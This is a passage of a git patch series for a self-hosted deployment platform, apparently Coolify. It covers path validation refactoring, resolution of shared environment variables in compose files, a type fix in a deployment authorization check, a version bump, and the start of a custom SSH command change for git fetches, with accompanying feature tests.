- Extend allowed characters from [a-zA-Z0-9._\-/] to [a-zA-Z0-9._\-/~@+] to support:
  - Scoped npm packages (@org/package)
  - Language-specific directories (c++, rust+)
  - Version markers (v1~, build~)
- Replace duplicate inline regex patterns across multiple files
- Add tests for paths with @ symbol and tilde/plus characters
---
 app/Jobs/ApplicationDeploymentJob.php         |  2 +-
 app/Livewire/Project/Application/General.php  | 12 +++----
 .../Project/New/GithubPrivateRepository.php   |  2 +-
 .../New/GithubPrivateRepositoryDeployKey.php  |  4 +--
 .../Project/New/PublicGitRepository.php       |  4 +--
 app/Support/ValidationPatterns.php            | 26 +++++++++++++-
 bootstrap/helpers/api.php                     |  4 +--
 .../Feature/CommandInjectionSecurityTest.php  | 36 ++++++++++++++++++-
 8 files changed, 74 insertions(+), 16 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index c80d31ab3..b51d04fca 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -3929,7 +3929,7 @@ private function add_build_secrets_to_compose($composeFile)
 
     private function validatePathField(string $value, string $fieldName): string
     {
-        if (! preg_match('/^\/[a-zA-Z0-9._\-\/]+$/', $value)) {
+        if (! preg_match(\App\Support\ValidationPatterns::FILE_PATH_PATTERN, $value)) {
             throw new \RuntimeException("Invalid {$fieldName}: contains forbidden characters.");
         }
         if (str_contains($value, '..')) {
diff --git a/app/Livewire/Project/Application/General.php b/app/Livewire/Project/Application/General.php
index 747536bcf..b3fe99806 100644
--- a/app/Livewire/Project/Application/General.php
+++ b/app/Livewire/Project/Application/General.php
@@ -73,7 +73,7 @@ class General extends Component
     #[Validate(['string', 'nullable'])]
     public ?string $dockerfile = null;
 
-    #[Validate(['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'])]
+    #[Validate(['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/~@+]+$/'])]
     public ?string $dockerfileLocation = null;
 
     #[Validate(['string', 'nullable'])]
@@ -85,7 +85,7 @@ class General extends Component
     #[Validate(['string', 'nullable'])]
     public ?string $dockerRegistryImageTag = null;
 
-    #[Validate(['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'])]
+    #[Validate(['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/~@+]+$/'])]
     public ?string $dockerComposeLocation = null;
 
     #[Validate(['string', 'nullable'])]
@@ -198,8 +198,8 @@ protected function rules(): array
             'dockerfile' => 'nullable',
             'dockerRegistryImageName' => 'nullable',
             'dockerRegistryImageTag' => 'nullable',
-            'dockerfileLocation' => ['nullable', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
-            'dockerComposeLocation' => ['nullable', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
+            'dockerfileLocation' => ['nullable', 'regex:'.ValidationPatterns::FILE_PATH_PATTERN],
+            'dockerComposeLocation' => ['nullable', 'regex:'.ValidationPatterns::FILE_PATH_PATTERN],
             'dockerCompose' => 'nullable',
             'dockerComposeRaw' => 'nullable',
             'dockerfileTargetBuild' => 'nullable',
@@ -231,8 +231,8 @@ protected function messages(): array
         return array_merge(
             ValidationPatterns::combinedMessages(),
             [
-                'dockerfileLocation.regex' => 'The Dockerfile location must be a valid path starting with / and containing only alphanumeric characters, dots, hyphens, and slashes.',
-                'dockerComposeLocation.regex' => 'The Docker Compose location must be a valid path starting with / and containing only alphanumeric characters, dots, hyphens, and slashes.',
+                ...ValidationPatterns::filePathMessages('dockerfileLocation', 'Dockerfile'),
+                ...ValidationPatterns::filePathMessages('dockerComposeLocation', 'Docker Compose'),
                 'name.required' => 'The Name field is required.',
                 'gitRepository.required' => 'The Git Repository field is required.',
                 'gitBranch.required' => 'The Git Branch field is required.',
diff --git a/app/Livewire/Project/New/GithubPrivateRepository.php b/app/Livewire/Project/New/GithubPrivateRepository.php
index 1bb276b89..61ae0e151 100644
--- a/app/Livewire/Project/New/GithubPrivateRepository.php
+++ b/app/Livewire/Project/New/GithubPrivateRepository.php
@@ -168,7 +168,7 @@ public function submit()
                 'selected_repository_owner' => 'required|string|regex:/^[a-zA-Z0-9\-_]+$/',
                 'selected_repository_repo' => 'required|string|regex:/^[a-zA-Z0-9\-_\.]+$/',
                 'selected_branch_name' => ['required', 'string', new ValidGitBranch],
-                'docker_compose_location' => ['nullable', 'string', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
+                'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
             ]);
 
             if ($validator->fails()) {
diff --git a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
index f52c01e91..b9af20c76 100644
--- a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
+++ b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
@@ -64,7 +64,7 @@ class GithubPrivateRepositoryDeployKey extends Component
         'is_static' => 'required|boolean',
         'publish_directory' => 'nullable|string',
         'build_pack' => 'required|string',
-        'docker_compose_location' => ['nullable', 'string', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
+        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
     ];
 
     protected function rules()
@@ -76,7 +76,7 @@ protected function rules()
             'is_static' => 'required|boolean',
             'publish_directory' => 'nullable|string',
             'build_pack' => 'required|string',
-            'docker_compose_location' => ['nullable', 'string', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
+            'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
         ];
     }
 
diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index a08c448dd..cc2510a66 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -70,7 +70,7 @@ class PublicGitRepository extends Component
         'publish_directory' => 'nullable|string',
         'build_pack' => 'required|string',
         'base_directory' => 'nullable|string',
-        'docker_compose_location' => ['nullable', 'string', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
+        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
     ];
 
     protected function rules()
@@ -82,7 +82,7 @@ protected function rules()
             'publish_directory' => 'nullable|string',
             'build_pack' => 'required|string',
             'base_directory' => 'nullable|string',
-            'docker_compose_location' => ['nullable', 'string', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
+            'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
             'git_branch' => ['required', 'string', new ValidGitBranch],
         ];
     }
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index a2da0fc46..2ae1536da 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -17,6 +17,12 @@ class ValidationPatterns
      */
     public const DESCRIPTION_PATTERN = '/^[\p{L}\p{M}\p{N}\s\-_.,!?()\'\"+=*@\/&]+$/u';
 
+    /**
+     * Pattern for file paths (dockerfile location, docker compose location, etc.)
+     * Allows alphanumeric, dots, hyphens, underscores, slashes, @, ~, and +
+     */
+    public const FILE_PATH_PATTERN = '/^\/[a-zA-Z0-9._\-\/~@+]+$/';
+
     /**
      * Get validation rules for name fields
      */
@@ -81,7 +87,25 @@ public static function descriptionMessages(): array
         ];
     }
 
-    /** 
+    /**
+     * Get validation rules for file path fields (dockerfile location, docker compose location)
+     */
+    public static function filePathRules(int $maxLength = 255): array
+    {
+        return ['nullable', 'string', 'max:'.$maxLength, 'regex:'.self::FILE_PATH_PATTERN];
+    }
+
+    /**
+     * Get validation messages for file path fields
+     */
+    public static function filePathMessages(string $field = 'dockerfileLocation', string $label = 'Dockerfile'): array
+    {
+        return [
+            "{$field}.regex" => "The {$label} location must be a valid path starting with / and containing only alphanumeric characters, dots, hyphens, underscores, slashes, @, ~, and +.",
+        ];
+    }
+
+    /**
      * Get combined validation messages for both name and description fields
      */
     public static function combinedMessages(): array
diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index 1b03a4d37..43c074cd1 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -134,8 +134,8 @@ function sharedDataApplications()
         'manual_webhook_secret_gitlab' => 'string|nullable',
         'manual_webhook_secret_bitbucket' => 'string|nullable',
         'manual_webhook_secret_gitea' => 'string|nullable',
-        'dockerfile_location' => ['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
-        'docker_compose_location' => ['string', 'nullable', 'max:255', 'regex:/^\/[a-zA-Z0-9._\-\/]+$/'],
+        'dockerfile_location' => ['string', 'nullable', 'max:255', 'regex:'.\App\Support\ValidationPatterns::FILE_PATH_PATTERN],
+        'docker_compose_location' => ['string', 'nullable', 'max:255', 'regex:'.\App\Support\ValidationPatterns::FILE_PATH_PATTERN],
         'docker_compose' => 'string|nullable',
         'docker_compose_domains' => 'array|nullable',
         'docker_compose_custom_start_command' => 'string|nullable',
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index 47e9f3b35..7047e4bc6 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -91,6 +91,28 @@
             ->toBe('/docker/Dockerfile.prod');
     });
 
+    test('allows path with @ symbol for scoped packages', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+        $method = $job->getMethod('validatePathField');
+        $method->setAccessible(true);
+
+        $instance = $job->newInstanceWithoutConstructor();
+
+        expect($method->invoke($instance, '/packages/@intlayer/mcp/Dockerfile', 'dockerfile_location'))
+            ->toBe('/packages/@intlayer/mcp/Dockerfile');
+    });
+
+    test('allows path with tilde and plus characters', function () {
+        $job = new ReflectionClass(ApplicationDeploymentJob::class);
+        $method = $job->getMethod('validatePathField');
+        $method->setAccessible(true);
+
+        $instance = $job->newInstanceWithoutConstructor();
+
+        expect($method->invoke($instance, '/build~v1/c++/Dockerfile', 'dockerfile_location'))
+            ->toBe('/build~v1/c++/Dockerfile');
+    });
+
     test('allows valid compose file path', function () {
         $job = new ReflectionClass(ApplicationDeploymentJob::class);
         $method = $job->getMethod('validatePathField');
@@ -149,6 +171,18 @@
     });
 });
 
+    test('dockerfile_location validation allows paths with @ for scoped packages', function () {
+        $rules = sharedDataApplications();
+
+        $validator = validator(
+            ['dockerfile_location' => '/packages/@intlayer/mcp/Dockerfile'],
+            ['dockerfile_location' => $rules['dockerfile_location']]
+        );
+
+        expect($validator->fails())->toBeFalse();
+    });
+});
+
 describe('sharedDataApplications rules survive array_merge in controller', function () {
     test('docker_compose_location safe regex is not overridden by local rules', function () {
         $sharedRules = sharedDataApplications();
@@ -164,7 +198,7 @@
 
         // The merged rules for docker_compose_location should be the safe regex, not just 'string'
         expect($merged['docker_compose_location'])->toBeArray();
-        expect($merged['docker_compose_location'])->toContain('regex:/^\/[a-zA-Z0-9._\-\/]+$/');
+        expect($merged['docker_compose_location'])->toContain('regex:'.\App\Support\ValidationPatterns::FILE_PATH_PATTERN);
     });
 });
 

From 7cfc6746c7cb03e8ecdbda38deb3f33dfdf56048 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 13:23:13 +0100
Subject: [PATCH 046/213] fix(parsers): resolve shared variables in compose
 environment

Extract shared variable resolution logic into a reusable helper function
`resolveSharedEnvironmentVariables()` and apply it in applicationParser and
serviceParser to ensure patterns like {{environment.VAR}}, {{project.VAR}},
and {{team.VAR}} are properly resolved in the compose environment section.

Without this, unresolved {{...}} strings would take precedence over resolved
values from the .env file (env_file:) in docker-compose configurations.
---
 app/Models/EnvironmentVariable.php            |  32 +----
 bootstrap/helpers/parsers.php                 |  14 ++
 bootstrap/helpers/shared.php                  |  46 +++++++
 .../SharedVariableComposeResolutionTest.php   | 128 ++++++++++++++++++
 4 files changed, 189 insertions(+), 31 deletions(-)
 create mode 100644 tests/Feature/SharedVariableComposeResolutionTest.php

diff --git a/app/Models/EnvironmentVariable.php b/app/Models/EnvironmentVariable.php
index 0a004f765..cf60d5ab5 100644
--- a/app/Models/EnvironmentVariable.php
+++ b/app/Models/EnvironmentVariable.php
@@ -214,37 +214,7 @@ protected function isShared(): Attribute
 
     private function get_real_environment_variables(?string $environment_variable = null, $resource = null)
     {
-        if ((is_null($environment_variable) && $environment_variable === '') || is_null($resource)) {
-            return null;
-        }
-        $environment_variable = trim($environment_variable);
-        $sharedEnvsFound = str($environment_variable)->matchAll('/{{(.*?)}}/');
-        if ($sharedEnvsFound->isEmpty()) {
-            return $environment_variable;
-        }
-        foreach ($sharedEnvsFound as $sharedEnv) {
-            $type = str($sharedEnv)->trim()->match('/(.*?)\./');
-            if (! collect(SHARED_VARIABLE_TYPES)->contains($type)) {
-                continue;
-            }
-            $variable = str($sharedEnv)->trim()->match('/\.(.*)/');
-            if ($type->value() === 'environment') {
-                $id = $resource->environment->id;
-            } elseif ($type->value() === 'project') {
-                $id = $resource->environment->project->id;
-            } elseif ($type->value() === 'team') {
-                $id = $resource->team()->id;
-            }
-            if (is_null($id)) {
-                continue;
-            }
-            $environment_variable_found = SharedEnvironmentVariable::where('type', $type)->where('key', $variable)->where('team_id', $resource->team()->id)->where("{$type}_id", $id)->first();
-            if ($environment_variable_found) {
-                $environment_variable = str($environment_variable)->replace("{{{$sharedEnv}}}", $environment_variable_found->value);
-            }
-        }
-
-        return str($environment_variable)->value();
+        return resolveSharedEnvironmentVariables($environment_variable, $resource);
     }
 
     private function get_environment_variables(?string $environment_variable = null): ?string
diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php
index cb9811e46..e84df55f9 100644
--- a/bootstrap/helpers/parsers.php
+++ b/bootstrap/helpers/parsers.php
@@ -1294,6 +1294,13 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                     // Otherwise keep empty string as-is
                 }
 
+                // Resolve shared variable patterns like {{environment.VAR}}, {{project.VAR}}, {{team.VAR}}
+                // Without this, literal {{...}} strings end up in the compose environment: section,
+                // which takes precedence over the resolved values in the .env file (env_file:)
+                if (is_string($value) && str_contains($value, '{{')) {
+                    $value = resolveSharedEnvironmentVariables($value, $resource);
+                }
+
                 return $value;
             });
         }
@@ -2558,6 +2565,13 @@ function serviceParser(Service $resource): Collection
                     // Otherwise keep empty string as-is
                 }
 
+                // Resolve shared variable patterns like {{environment.VAR}}, {{project.VAR}}, {{team.VAR}}
+                // Without this, literal {{...}} strings end up in the compose environment: section,
+                // which takes precedence over the resolved values in the .env file (env_file:)
+                if (is_string($value) && str_contains($value, '{{')) {
+                    $value = resolveSharedEnvironmentVariables($value, $resource);
+                }
+
                 return $value;
             });
         }
diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index b58f2ab7f..e81d2a467 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -3972,3 +3972,49 @@ function downsampleLTTB(array $data, int $threshold): array
 
     return $sampled;
 }
+
+/**
+ * Resolve shared environment variable patterns like {{environment.VAR}}, {{project.VAR}}, {{team.VAR}}.
+ *
+ * This is the canonical implementation used by both EnvironmentVariable::realValue and the compose parsers
+ * to ensure shared variable references are replaced with their actual values.
+ */
+function resolveSharedEnvironmentVariables(?string $value, $resource): ?string
+{
+    if (is_null($value) || $value === '' || is_null($resource)) {
+        return $value;
+    }
+    $value = trim($value);
+    $sharedEnvsFound = str($value)->matchAll('/{{(.*?)}}/');
+    if ($sharedEnvsFound->isEmpty()) {
+        return $value;
+    }
+    foreach ($sharedEnvsFound as $sharedEnv) {
+        $type = str($sharedEnv)->trim()->match('/(.*?)\./');
+        if (! collect(SHARED_VARIABLE_TYPES)->contains($type)) {
+            continue;
+        }
+        $variable = str($sharedEnv)->trim()->match('/\.(.*)/');
+        $id = null;
+        if ($type->value() === 'environment') {
+            $id = $resource->environment->id;
+        } elseif ($type->value() === 'project') {
+            $id = $resource->environment->project->id;
+        } elseif ($type->value() === 'team') {
+            $id = $resource->team()->id;
+        }
+        if (is_null($id)) {
+            continue;
+        }
+        $found = \App\Models\SharedEnvironmentVariable::where('type', $type)
+            ->where('key', $variable)
+            ->where('team_id', $resource->team()->id)
+            ->where("{$type}_id", $id)
+            ->first();
+        if ($found) {
+            $value = str($value)->replace("{{{$sharedEnv}}}", $found->value);
+        }
+    }
+
+    return str($value)->value();
+}
diff --git a/tests/Feature/SharedVariableComposeResolutionTest.php b/tests/Feature/SharedVariableComposeResolutionTest.php
new file mode 100644
index 000000000..5ffb027f0
--- /dev/null
+++ b/tests/Feature/SharedVariableComposeResolutionTest.php
@@ -0,0 +1,128 @@
+<?php
+
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\EnvironmentVariable;
+use App\Models\Project;
+use App\Models\SharedEnvironmentVariable;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->user = User::factory()->create();
+    $this->team = Team::factory()->create();
+    $this->user->teams()->attach($this->team);
+
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create([
+        'project_id' => $this->project->id,
+    ]);
+
+    $this->application = Application::factory()->create([
+        'environment_id' => $this->environment->id,
+    ]);
+});
+
+test('resolveSharedEnvironmentVariables resolves environment-scoped variable', function () {
+    SharedEnvironmentVariable::create([
+        'key' => 'DRAGONFLY_URL',
+        'value' => 'redis://dragonfly:6379',
+        'type' => 'environment',
+        'environment_id' => $this->environment->id,
+        'team_id' => $this->team->id,
+    ]);
+
+    $resolved = resolveSharedEnvironmentVariables('{{environment.DRAGONFLY_URL}}', $this->application);
+    expect($resolved)->toBe('redis://dragonfly:6379');
+});
+
+test('resolveSharedEnvironmentVariables resolves project-scoped variable', function () {
+    SharedEnvironmentVariable::create([
+        'key' => 'DB_HOST',
+        'value' => 'postgres.internal',
+        'type' => 'project',
+        'project_id' => $this->project->id,
+        'team_id' => $this->team->id,
+    ]);
+
+    $resolved = resolveSharedEnvironmentVariables('{{project.DB_HOST}}', $this->application);
+    expect($resolved)->toBe('postgres.internal');
+});
+
+test('resolveSharedEnvironmentVariables resolves team-scoped variable', function () {
+    SharedEnvironmentVariable::create([
+        'key' => 'GLOBAL_API_KEY',
+        'value' => 'sk-123456',
+        'type' => 'team',
+        'team_id' => $this->team->id,
+    ]);
+
+    $resolved = resolveSharedEnvironmentVariables('{{team.GLOBAL_API_KEY}}', $this->application);
+    expect($resolved)->toBe('sk-123456');
+});
+
+test('resolveSharedEnvironmentVariables returns original when no match found', function () {
+    $resolved = resolveSharedEnvironmentVariables('{{environment.NONEXISTENT}}', $this->application);
+    expect($resolved)->toBe('{{environment.NONEXISTENT}}');
+});
+
+test('resolveSharedEnvironmentVariables handles null and empty values', function () {
+    expect(resolveSharedEnvironmentVariables(null, $this->application))->toBeNull();
+    expect(resolveSharedEnvironmentVariables('', $this->application))->toBe('');
+    expect(resolveSharedEnvironmentVariables('plain-value', $this->application))->toBe('plain-value');
+});
+
+test('resolveSharedEnvironmentVariables resolves multiple variables in one string', function () {
+    SharedEnvironmentVariable::create([
+        'key' => 'HOST',
+        'value' => 'myhost',
+        'type' => 'environment',
+        'environment_id' => $this->environment->id,
+        'team_id' => $this->team->id,
+    ]);
+    SharedEnvironmentVariable::create([
+        'key' => 'PORT',
+        'value' => '6379',
+        'type' => 'environment',
+        'environment_id' => $this->environment->id,
+        'team_id' => $this->team->id,
+    ]);
+
+    $resolved = resolveSharedEnvironmentVariables('redis://{{environment.HOST}}:{{environment.PORT}}', $this->application);
+    expect($resolved)->toBe('redis://myhost:6379');
+});
+
+test('resolveSharedEnvironmentVariables handles spaces in pattern', function () {
+    SharedEnvironmentVariable::create([
+        'key' => 'MY_VAR',
+        'value' => 'resolved-value',
+        'type' => 'environment',
+        'environment_id' => $this->environment->id,
+        'team_id' => $this->team->id,
+    ]);
+
+    $resolved = resolveSharedEnvironmentVariables('{{ environment.MY_VAR }}', $this->application);
+    expect($resolved)->toBe('resolved-value');
+});
+
+test('EnvironmentVariable real_value still resolves shared variables after refactor', function () {
+    SharedEnvironmentVariable::create([
+        'key' => 'DRAGONFLY_URL',
+        'value' => 'redis://dragonfly:6379',
+        'type' => 'environment',
+        'environment_id' => $this->environment->id,
+        'team_id' => $this->team->id,
+    ]);
+
+    $env = EnvironmentVariable::create([
+        'key' => 'REDIS_URL',
+        'value' => '{{environment.DRAGONFLY_URL}}',
+        'resourceable_id' => $this->application->id,
+        'resourceable_type' => $this->application->getMorphClass(),
+    ]);
+
+    expect($env->real_value)->toBe('redis://dragonfly:6379');
+});

From 3819676555609cfdd9fe4d82f94c7d00e2cd955b Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 13:25:10 +0100
Subject: [PATCH 047/213] fix(api): cast teamId to int in deployment
 authorization check

Ensure proper type comparison when verifying deployment team ownership.
Adds comprehensive feature tests for the GET /api/v1/deployments/{uuid} endpoint.
---
 app/Http/Controllers/Api/DeployController.php |  2 +-
 tests/Feature/DeploymentByUuidApiTest.php     | 94 +++++++++++++++++++
 2 files changed, 95 insertions(+), 1 deletion(-)
 create mode 100644 tests/Feature/DeploymentByUuidApiTest.php

diff --git a/app/Http/Controllers/Api/DeployController.php b/app/Http/Controllers/Api/DeployController.php
index a21940257..85d532f62 100644
--- a/app/Http/Controllers/Api/DeployController.php
+++ b/app/Http/Controllers/Api/DeployController.php
@@ -128,7 +128,7 @@ public function deployment_by_uuid(Request $request)
             return response()->json(['message' => 'Deployment not found.'], 404);
         }
         $application = $deployment->application;
-        if (! $application || data_get($application->team(), 'id') !== $teamId) {
+        if (! $application || data_get($application->team(), 'id') !== (int) $teamId) {
             return response()->json(['message' => 'Deployment not found.'], 404);
         }
 
diff --git a/tests/Feature/DeploymentByUuidApiTest.php b/tests/Feature/DeploymentByUuidApiTest.php
new file mode 100644
index 000000000..2542f3deb
--- /dev/null
+++ b/tests/Feature/DeploymentByUuidApiTest.php
@@ -0,0 +1,94 @@
+<?php
+
+use App\Enums\ApplicationDeploymentStatus;
+use App\Models\Application;
+use App\Models\ApplicationDeploymentQueue;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Str;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    // Create token manually since User::createToken relies on session('currentTeam')
+    $plainTextToken = Str::random(40);
+    $token = $this->user->tokens()->create([
+        'name' => 'test-token',
+        'token' => hash('sha256', $plainTextToken),
+        'abilities' => ['*'],
+        'team_id' => $this->team->id,
+    ]);
+    $this->bearerToken = $token->getKey().'|'.$plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+    $this->application = Application::factory()->create([
+        'environment_id' => $this->environment->id,
+    ]);
+});
+
+describe('GET /api/v1/deployments/{uuid}', function () {
+    test('returns 401 when not authenticated', function () {
+        $response = $this->getJson('/api/v1/deployments/fake-uuid');
+
+        $response->assertUnauthorized();
+    });
+
+    test('returns 404 when deployment not found', function () {
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->getJson('/api/v1/deployments/non-existent-uuid');
+
+        $response->assertNotFound();
+        $response->assertJson(['message' => 'Deployment not found.']);
+    });
+
+    test('returns deployment when uuid is valid and belongs to team', function () {
+        $deployment = ApplicationDeploymentQueue::create([
+            'deployment_uuid' => 'test-deploy-uuid',
+            'application_id' => $this->application->id,
+            'server_id' => $this->server->id,
+            'status' => ApplicationDeploymentStatus::IN_PROGRESS->value,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->getJson("/api/v1/deployments/{$deployment->deployment_uuid}");
+
+        $response->assertSuccessful();
+        $response->assertJsonFragment(['deployment_uuid' => 'test-deploy-uuid']);
+    });
+
+    test('returns 404 when deployment belongs to another team', function () {
+        $otherTeam = Team::factory()->create();
+        $otherProject = Project::factory()->create(['team_id' => $otherTeam->id]);
+        $otherEnvironment = Environment::factory()->create(['project_id' => $otherProject->id]);
+        $otherApplication = Application::factory()->create([
+            'environment_id' => $otherEnvironment->id,
+        ]);
+        $otherServer = Server::factory()->create(['team_id' => $otherTeam->id]);
+
+        $deployment = ApplicationDeploymentQueue::create([
+            'deployment_uuid' => 'other-team-deploy-uuid',
+            'application_id' => $otherApplication->id,
+            'server_id' => $otherServer->id,
+            'status' => ApplicationDeploymentStatus::IN_PROGRESS->value,
+        ]);
+
+        $response = $this->withHeaders([
+            'Authorization' => 'Bearer '.$this->bearerToken,
+        ])->getJson("/api/v1/deployments/{$deployment->deployment_uuid}");
+
+        $response->assertNotFound();
+    });
+});

From fd6ac4ef9dce9f01bb4dd6689c99c425c63421f2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 13:26:59 +0100
Subject: [PATCH 048/213] version++

---
 config/constants.php        | 2 +-
 other/nightly/versions.json | 4 ++--
 versions.json               | 4 ++--
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/config/constants.php b/config/constants.php
index 0fc20fbc3..5cb924148 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -2,7 +2,7 @@
 
 return [
     'coolify' => [
-        'version' => '4.0.0-beta.467',
+        'version' => '4.0.0-beta.468',
         'helper_version' => '1.0.12',
         'realtime_version' => '1.0.11',
         'self_hosted' => env('SELF_HOSTED', true),
diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index 565329c00..7fbe25374 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -1,10 +1,10 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.467"
+            "version": "4.0.0-beta.468"
         },
         "nightly": {
-            "version": "4.0.0-beta.468"
+            "version": "4.0.0-beta.469"
         },
         "helper": {
             "version": "1.0.12"
diff --git a/versions.json b/versions.json
index 565329c00..7fbe25374 100644
--- a/versions.json
+++ b/versions.json
@@ -1,10 +1,10 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.467"
+            "version": "4.0.0-beta.468"
         },
         "nightly": {
-            "version": "4.0.0-beta.468"
+            "version": "4.0.0-beta.469"
         },
         "helper": {
             "version": "1.0.12"

From 92c8ad449fb07ee4272fa8c3d6600b9e8c044c2d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 12 Mar 2026 13:32:43 +0100
Subject: [PATCH 049/213] feat(git-import): support custom ssh command for
 fetch, submodule, and lfs

Allow passing a custom GIT_SSH_COMMAND to setGitImportSettings() so that git fetch,
submodule update, and lfs pull use the same SSH authentication as the initial clone.
This is required for git sources like GitLab that use custom ports and identity files.

Also remove unnecessary SSH retry event tracking and add test coverage.
---
 app/Models/Application.php                | 24 ++++++----
 app/Traits/ExecuteRemoteCommand.php       |  7 ---
 tests/Feature/ApplicationRollbackTest.php | 58 +++++++++++++++++++++++
 3 files changed, 73 insertions(+), 16 deletions(-)

diff --git a/app/Models/Application.php b/app/Models/Application.php
index 7b46b6f3d..9f59445d8 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -1087,12 +1087,16 @@ public function dirOnServer()
         return application_configuration_dir()."/{$this->uuid}";
     }
 
-    public function setGitImportSettings(string $deployment_uuid, string $git_clone_command, bool $public = false, ?string $commit = null)
+    public function setGitImportSettings(string $deployment_uuid, string $git_clone_command, bool $public = false, ?string $commit = null, ?string $git_ssh_command = null)
     {
         $baseDir = $this->generateBaseDir($deployment_uuid);
         $escapedBaseDir = escapeshellarg($baseDir);
         $isShallowCloneEnabled = $this->settings?->is_git_shallow_clone_enabled ?? false;
 
+        // Use the full GIT_SSH_COMMAND (including -i for SSH key and port options) when provided,
+        // so that git fetch, submodule update, and lfs pull can authenticate the same way as git clone.
+        $sshCommand = $git_ssh_command ?? 'GIT_SSH_COMMAND="ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null"';
+
         // Use the explicitly passed commit (e.g. from rollback), falling back to the application's git_commit_sha.
         // Invalid refs will cause the git checkout/fetch command to fail on the remote server.
         $commitToUse = $commit ?? $this->git_commit_sha;
@@ -1102,9 +1106,9 @@ public function setGitImportSettings(string $deployment_uuid, string $git_clone_
             // If shallow clone is enabled and we need a specific commit,
             // we need to fetch that specific commit with depth=1
             if ($isShallowCloneEnabled) {
-                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && GIT_SSH_COMMAND=\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\" git fetch --depth=1 origin {$escapedCommit} && git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
+                $git_clone_command = "{$git_clone_command} && cd {$escapedBaseDir} && {$sshCommand} git fetch --depth=1 origin {$escapedCommit} && git -c advice.detachedHead=false checkout {$escapedCommit} >/dev/null 2>&1";
             } else {
